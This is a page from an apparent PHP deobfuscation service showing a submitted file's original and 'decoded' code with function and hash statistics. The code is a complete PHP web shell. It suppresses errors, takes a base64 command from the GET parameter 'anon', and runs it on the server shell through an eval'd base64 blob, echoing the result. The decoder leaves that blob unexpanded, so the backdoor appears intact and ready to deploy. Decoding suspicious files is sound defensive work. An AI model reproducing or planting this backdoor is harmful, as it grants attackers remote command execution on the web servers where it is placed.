Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @error_reporting(0); $anon = $_GET['anon']; if (isset($anon)) { eval(base64_dec..

Decoded Output download

<?php 
@error_reporting(0);  
$anon = $_GET['anon']; 
if (isset($anon)) { 
eval(base64_decode('JGNtZD1iYXNlNjRfZGVjb2RlKCRhbm9uKTsNCiR2YWljbWQgPSBgJGNtZGA7DQplY2hvICR2YWljbWQ7'));  
}else { 
echo base64_decode(RGFya0NyZXdGcmllbmRz); 
} 
?>

Did this file decode correctly?

Original Code

<?php
@error_reporting(0); 
$anon = $_GET['anon'];
if (isset($anon)) {
eval(base64_decode('JGNtZD1iYXNlNjRfZGVjb2RlKCRhbm9uKTsNCiR2YWljbWQgPSBgJGNtZGA7DQplY2hvICR2YWljbWQ7')); 
}else {
echo base64_decode(RGFya0NyZXdGcmllbmRz);
}
?>

Function Calls

base64_decode 1
error_reporting 1

Variables

$anon None

Stats

MD5 e87d81c9eb96f2206a9f2ae0c49e711a
Eval Count 1
Decode Time 95 ms